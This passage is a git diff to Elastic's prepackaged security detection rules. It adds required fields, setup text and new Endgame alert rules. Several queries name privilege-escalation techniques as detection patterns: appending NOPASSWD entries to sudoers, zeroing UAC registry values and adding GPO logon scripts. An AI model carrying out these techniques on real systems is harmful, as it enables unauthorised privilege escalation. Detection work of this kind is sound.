"3f0e5410-a4bf-4e8c-bcfc-79d67a285c54", "rule_name_override": "event.action", + "setup": "The CyberArk Privileged Access Security (PAS) Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -59,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.json index f7e3fd70757d6..14ece65425e47 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_cyberarkpas_recommended_events_to_monitor_promotion.json @@ -14,14 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "CyberArk Privileged Access Security Recommended Monitor", - "note": "## Config\n\nThe CyberArk Privileged Access Security (PAS) Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n## Triage and analysis\n\nThis is a promotion rule for CyberArk events, which the vendor recommends should be monitored.\nConsult vendor documentation on interpreting specific events.\n", + "note": "## Triage and analysis\n\nThis is a promotion rule for CyberArk events, which the vendor recommends should be monitored.\nConsult vendor documentation on interpreting specific events.", "query": "event.dataset:cyberarkpas.audit and\n event.code:(4 or 22 or 24 or 31 or 38 or 57 or 60 or 130 or 295 or 300 or 302 or\n 308 or 319 or 344 or 346 or 359 or 361 or 378 or 380 or 411) and\n not event.type:error\n", "references": [ "https://docs.cyberark.com/Product-Doc/OnlineHelp/PAS/Latest/en/Content/PASREF/Vault%20Audit%20Action%20Codes.htm?tocpath=Administration%7CReferences%7C_____3#RecommendedActionCodesforMonitoring" ], + "related_integrations": [ + { + "package": "cyberarkpas", + "version": "2.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "c5f81243-56e0-47f9-b5bb-55a5ed89ba57", "rule_name_override": "event.action", + "setup": "The CyberArk Privileged Access Security (PAS) Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -59,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_disable_uac_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_disable_uac_registry.json index d87e6bf6d5c9a..bc0b84823273d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_disable_uac_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_disable_uac_registry.json @@ -12,15 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Disabling User Account Control via Registry Modification", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "registry where event.type == \"change\" and\n registry.path :\n (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\PromptOnSecureDesktop\"\n ) and\n registry.data.strings : (\"0\", \"0x00000000\")\n", "references": [ "https://www.greyhathacker.net/?p=796", "https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings", "https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-overview" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -77,5 +95,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_echo_nopasswd_sudoers.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_echo_nopasswd_sudoers.json index 6023854cd6641..616f8299f6878 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_echo_nopasswd_sudoers.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_echo_nopasswd_sudoers.json @@ -12,6 +12,23 @@ "license": "Elastic License v2", "name": "Potential Privilege Escalation via Sudoers File Modification", "query": "event.category:process and event.type:start and process.args:(echo and *NOPASSWD*ALL*)\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "76152ca1-71d0-4003-9e37-0983e12832da", "severity": "high", @@ -49,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_cred_manipulation_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_cred_manipulation_detected.json new file mode 100644 index 0000000000000..65bd25cd01aea --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_cred_manipulation_detected.json @@ -0,0 +1,71 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame detected Credential Manipulation. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Credential Manipulation - Detected - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:token_manipulation_event or endgame.event_subtype_full:token_manipulation_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c0be5f31-e180-48ed-aa08-96b36899d48f", + "severity": "high", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_cred_manipulation_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_cred_manipulation_prevented.json new file mode 100644 index 0000000000000..98a409925d286 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_cred_manipulation_prevented.json @@ -0,0 +1,71 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame prevented Credential Manipulation. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Credential Manipulation - Prevented - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:token_manipulation_event or endgame.event_subtype_full:token_manipulation_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c9e38e64-3f4c-4bf3-ad48-0e61a60ea1fa", + "severity": "medium", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_permission_theft_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_permission_theft_detected.json new file mode 100644 index 0000000000000..25c9e287f2b80 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_permission_theft_detected.json @@ -0,0 +1,71 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame detected Permission Theft. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Permission Theft - Detected - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:token_protection_event or endgame.event_subtype_full:token_protection_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c3167e1b-f73c-41be-b60b-87f4df707fe3", + "severity": "high", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_permission_theft_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_permission_theft_prevented.json new file mode 100644 index 0000000000000..4298d427d3d13 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_permission_theft_prevented.json @@ -0,0 +1,71 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame prevented Permission Theft. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Permission Theft - Prevented - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:token_protection_event or endgame.event_subtype_full:token_protection_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "453f659e-0429-40b1-bfdb-b6957286e04b", + "severity": "medium", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1134", + "name": "Access Token Manipulation", + "reference": "https://attack.mitre.org/techniques/T1134/" + } + ] + } + ], + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_process_injection_detected.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_process_injection_detected.json new file mode 100644 index 0000000000000..708faeb0a28bd --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_process_injection_detected.json @@ -0,0 +1,71 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame detected Process Injection. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Process Injection - Detected - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:detection and (event.action:kernel_shellcode_event or endgame.event_subtype_full:kernel_shellcode_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "80c52164-c82a-402c-9964-852533d58be1", + "severity": "high", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_process_injection_prevented.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_process_injection_prevented.json new file mode 100644 index 0000000000000..f89e54d26e688 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_endgame_process_injection_prevented.json @@ -0,0 +1,71 @@ +{ + "author": [ + "Elastic" + ], + "description": "Elastic Endgame prevented Process Injection. Click the Elastic Endgame icon in the event.module column or the link in the rule.reference column for additional information.", + "from": "now-15m", + "index": [ + "endgame-*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "max_signals": 10000, + "name": "Process Injection - Prevented - Elastic Endgame", + "query": "event.kind:alert and event.module:endgame and endgame.metadata.type:prevention and (event.action:kernel_shellcode_event or endgame.event_subtype_full:kernel_shellcode_event)\n", + "required_fields": [ + { + "ecs": false, + "name": "endgame.event_subtype_full", + "type": "unknown" + }, + { + "ecs": false, + "name": "endgame.metadata.type", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.kind", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.module", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "990838aa-a953-4f3e-b3cb-6ddf7584de9e", + "severity": "medium", + "tags": [ + "Elastic", + "Elastic Endgame", + "Threat Detection", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + } + ], + "type": "query", + "version": 9 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_explicit_creds_via_scripting.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_explicit_creds_via_scripting.json index 32c47afd93019..7c44e14efa169 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_explicit_creds_via_scripting.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_explicit_creds_via_scripting.json @@ -11,11 +11,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Execution with Explicit Credentials via Scripting", - "query": "event.category:process and event.type:(start or process_started) and\n process.name:\"security_authtrampoline\" and\n process.parent.name:(osascript or com.apple.automator.runner or sh or bash or dash or zsh or python* or perl* or php* or ruby or pwsh)\n", + "query": "event.category:process and event.type:(start or process_started) and\n process.name:\"security_authtrampoline\" and\n process.parent.name:(osascript or com.apple.automator.runner or sh or bash or dash or zsh or python* or Python or perl* or php* or ruby or pwsh)\n", "references": [ "https://objectivebythesea.com/v2/talks/OBTS_v2_Thomas.pdf", "https://www.manpagez.com/man/8/security_authtrampoline/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "f0eb70e9-71e9-40cd-813f-bf8e8c812cb1", "severity": "medium", @@ -40,6 +62,18 @@ "id": "T1078", "name": "Valid Accounts", "reference": "https://attack.mitre.org/techniques/T1078/" + }, + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.004", + "name": "Elevated Execution with Prompt", + "reference": "https://attack.mitre.org/techniques/T1548/004/" + } + ] } ] }, @@ -61,5 +95,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_exploit_adobe_acrobat_updater.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_exploit_adobe_acrobat_updater.json index 0c30cbb23b56b..3b7b0651cefc1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_exploit_adobe_acrobat_updater.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_exploit_adobe_acrobat_updater.json @@ -18,6 +18,33 @@ "references": [ "https://rekken.github.io/2020/05/14/Security-Flaws-in-Adobe-Acrobat-Reader-Allow-Malicious-Program-to-Gain-Root-on-macOS-Silently/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f85ce03f-d8a8-4c83-acdc-5c8cd0592be7", "severity": "high", @@ -47,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_gcp_kubernetes_rolebindings_created_or_patched.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_gcp_kubernetes_rolebindings_created_or_patched.json index bc44e9cf35116..210e7df9491fc 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_gcp_kubernetes_rolebindings_created_or_patched.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_gcp_kubernetes_rolebindings_created_or_patched.json @@ -12,15 +12,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "GCP Kubernetes Rolebindings Created or Patched", - "note": "## Config\n\nThe GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:(io.k8s.authorization.rbac.v*.clusterrolebindings.create or \nio.k8s.authorization.rbac.v*.rolebindings.create or io.k8s.authorization.rbac.v*.clusterrolebindings.patch or \nio.k8s.authorization.rbac.v*.rolebindings.patch) and event.outcome:success and\nnot gcp.audit.authentication_info.principal_email:\"system:addon-manager\"\n", + "note": "", + "query": "event.dataset:(googlecloud.audit or gcp.audit) and event.action:(io.k8s.authorization.rbac.v*.clusterrolebindings.create or\nio.k8s.authorization.rbac.v*.rolebindings.create or io.k8s.authorization.rbac.v*.clusterrolebindings.patch or\nio.k8s.authorization.rbac.v*.rolebindings.patch) and event.outcome:success and\nnot gcp.audit.authentication_info.principal_email:\"system:addon-manager\"\n", "references": [ "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging", "https://unofficial-kubernetes.readthedocs.io/en/latest/admin/authorization/rbac/", "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control" ], + "related_integrations": [ + { + "package": "gcp", + "version": "1.10.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": false, + "name": "gcp.audit.authentication_info.principal_email", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "2f0bae2d-bf20-4465-be86-1311addebaa3", + "setup": "The GCP Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -43,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_iniscript.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_iniscript.json index 8ed57e28caaaf..63f1d51ec90ab 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_iniscript.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_group_policy_iniscript.json @@ -13,15 +13,53 @@ "language": "kuery", "license": "Elastic License v2", "name": "Startup/Logon Script added to Group Policy Object", - "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of\nclients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the\n`scripts.ini` or `psscripts.ini` files. The scripts are stored in the following path: `\\Machine\\Scripts\\`,\n`\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity\nis legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any\npotentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nObject Access > \nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nPolicies > \nWindows Settings > \nSecurity Settings > \nAdvanced Audit Policies Configuration > \nAudit Policies > \nDS Access > \nAudit Directory Service Changes (Success,Failure)\n```\n", + "note": "## Triage and analysis\n\n### Investigating Scheduled Task Execution at Scale via GPO\n\nGroup Policy Objects (GPOs) can be used by attackers to instruct arbitrarily large groups of\nclients to execute specified commands at startup, logon, shutdown, and logoff. This is done by creating or modifying the\n`scripts.ini` or `psscripts.ini` files. The scripts are stored in the following path: `\\Machine\\Scripts\\`,\n`\\User\\Scripts\\`\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity\nis legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `ScheduledTasks.xml` file, and check the `` and `` XML tags for any\npotentially malicious commands or binaries.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Scope which objects may be compromised by retrieving information about which objects are controlled by the GPO.\n\n### False positive analysis\n\n- Verify if the execution is legitimately authorized and executed under a change management process.\n\n### Related rules\n\n- Group Policy Abuse for Privilege Addition - b9554892-5e0e-424b-83a0-5aef95aa43bf\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "(\n event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:(gPCMachineExtensionNames or gPCUserExtensionNames) and\n winlog.event_data.AttributeValue:(*42B5FAAE-6536-11D2-AE5A-0000F87571E3* and\n (*40B66650-4972-11D1-A7CA-0000F87571E3* or *40B6664F-4972-11D1-A7CA-0000F87571E3*))\n)\nor\n(\n event.code:5145 and winlog.event_data.ShareName:\\\\\\\\*\\\\SYSVOL and\n winlog.event_data.RelativeTargetName:(*\\\\scripts.ini or *\\\\psscripts.ini) and\n (message:WriteData or winlog.event_data.AccessList:*%%4417*)\n)\n", "references": [ "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", "https://github.com/atc-project/atc-data/blob/f2bbb51ecf68e2c9f488e3c70dcdd3df51d2a46b/docs/Logging_Policies/LP_0029_windows_audit_detailed_file_share.md", "https://labs.f-secure.com/tools/sharpgpoabuse" ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "message", + "type": "match_only_text" + }, + { + "ecs": false, + "name": "winlog.event_data.AccessList", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.RelativeTargetName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.ShareName", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "16fac1a1-21ee-4ca6-b720-458e3855d046", + "setup": "The 'Audit Detailed File Share' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nObject Access >\nAudit Detailed File Share (Success,Failure)\n```\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```", "severity": "medium", "tags": [ "Elastic", @@ -62,5 +100,5 